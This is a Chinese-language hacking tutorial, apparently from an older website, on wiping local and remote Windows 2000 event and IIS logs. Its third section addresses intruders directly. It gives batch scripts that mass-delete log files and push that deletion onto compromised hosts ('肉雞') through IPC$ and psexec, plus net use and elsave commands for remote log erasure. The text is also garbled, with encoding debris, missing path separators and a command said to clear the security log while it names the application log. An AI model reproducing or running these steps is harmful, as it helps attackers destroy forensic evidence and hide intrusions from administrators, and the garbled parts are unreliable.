徹底清除本地和遠程系統日志文件

什么是日志文件？它是一些文件系統集合，依靠建立起的各種數據的日志文件而存在。在任何系統發(fā)生崩潰或需要重新啟動(dòng)時(shí)，數據就遵從日志文件中的信息記錄原封不動(dòng)進(jìn)行恢復。日志對于系統安全的作用是顯而易見(jiàn)的，無(wú)論是網(wǎng)絡(luò )管理員還是 黑客都非常重視日志，一個(gè)有經(jīng)驗的管理員往往能夠迅速通過(guò)日志了解到系統的安全性能，而一個(gè)聰明的黑客會(huì )在入侵成功后迅速清除掉對自己不利的日志。無(wú)論是攻還是防，日志的重要性由此可見(jiàn)。下面我們就來(lái)簡(jiǎn)單討論一下日志文件的清除方法。

　　一、日志文件的位置

　　Windows 2000的系統日志文件有應用程序日志，安全日志、系統日志、DNS服務(wù)器日志等等，應用程序日志、安全日志、系統日志、DNS日志默認位置：%systemroot%system32config。


　　安全日志文件：%systemroot%system32configSecEvent.EVT

　　系統日志文件：%systemroot%system32configSysEvent.EVT

　　應用程序日志文件：%systemroot%system32configAppEvent.EVT


　　有的管理員很可能將這些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目錄。

　　二、清除自己電腦中的日志

　　如果你要清除自己電腦中的日志，可以用管理員的身份來(lái)登錄Windows，然后在“控制面板”中進(jìn)入“管理工具”，再雙擊里面的“事件查看器”。打開(kāi)后我們就可以在這里清除日志文件了，里面有應用程序、安全和系統日志文件。舉個(gè)例子，比方說(shuō)你想清除安全日志，可以右鍵點(diǎn)擊“安全日志”，在彈出的菜單中選擇“屬性”。接下來(lái)在彈出的對話(huà)框中，點(diǎn)擊下面“清除日志”按鈕就可以清除了，如果你想以后再來(lái)清除這些日志的話(huà)，可以將“按需要改寫(xiě)尺寸”，這樣就可以在達到最大日志尺寸時(shí)進(jìn)行改寫(xiě)事件了，不會(huì )提示你清除日志。

　　三、清除遠程主機上的日志

　　大多數情況下，IIS的日志會(huì )忠實(shí)地記錄它接收到的任何請求（也有特殊的不被IIS記錄的攻擊），一個(gè)優(yōu)秀的系統管理員會(huì )利用這點(diǎn)來(lái)發(fā)現入侵的企圖，保護自己的系統。所以如果你是黑客，入侵系統成功后第一件事便是清除日志，擦去自己的形跡，這時(shí)可以用以下兩個(gè)辦法：一是自己編寫(xiě)批處理文件來(lái)解決，編寫(xiě)一個(gè)能清除日志的批處理非常簡(jiǎn)單，方法是：新建一個(gè)具有如下內容的批處理文件：
@del c:winntsystem32logfiles*.*

　　@del c:winntsystem32config*.evt

　　@del c:winntsystem32dtclog*.*

　　@del c:winntsystem32*.log

　　@del c:winntsystem32*.txt

　　@del c:winnt*.txt

　　@del c:winnt*.log

　　@del c:del.bat


　　把上面的內容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令，在它的前面加上“@”前綴字符，表示執行時(shí)本行在命令行或DOS里面不顯示，另外del命令大家一定清楚吧？它是刪除文件命令。


　　接下來(lái)再新建一個(gè)批處理文件，內容如下：

　　@copy del.bat %1c$

　　@echo 向肉雞復制本機的del.bat……OK

　　@psexec %1 c:del.bat

　　@echo 在肉雞上運行del.bat，清除日志文件……OK

　　保存為clean.bat即可，假設已經(jīng)與肉雞進(jìn)行了IPC連接，然后在CMD下輸入：clean.bat 肉雞IP，即可清除肉雞上的日志文件。

　　清除日志的另外一個(gè)方法是借助第三方軟件，如著(zhù)名黑客軟件流光的開(kāi)發(fā)者黑客小榕的elsave.exe，就是是一款可以遠程清除系統日志、應用程序日志、安全日志的軟件，大家可以在網(wǎng)上下載到。elsave.exe使用起來(lái)很簡(jiǎn)單，首先利用獲得的管理員賬號與對方建立IPC會(huì )話(huà)：net use ip pass /user: user，然后在命令行下執行如下命令：elsave -s ip -l application -C，這樣就刪除了安全日志。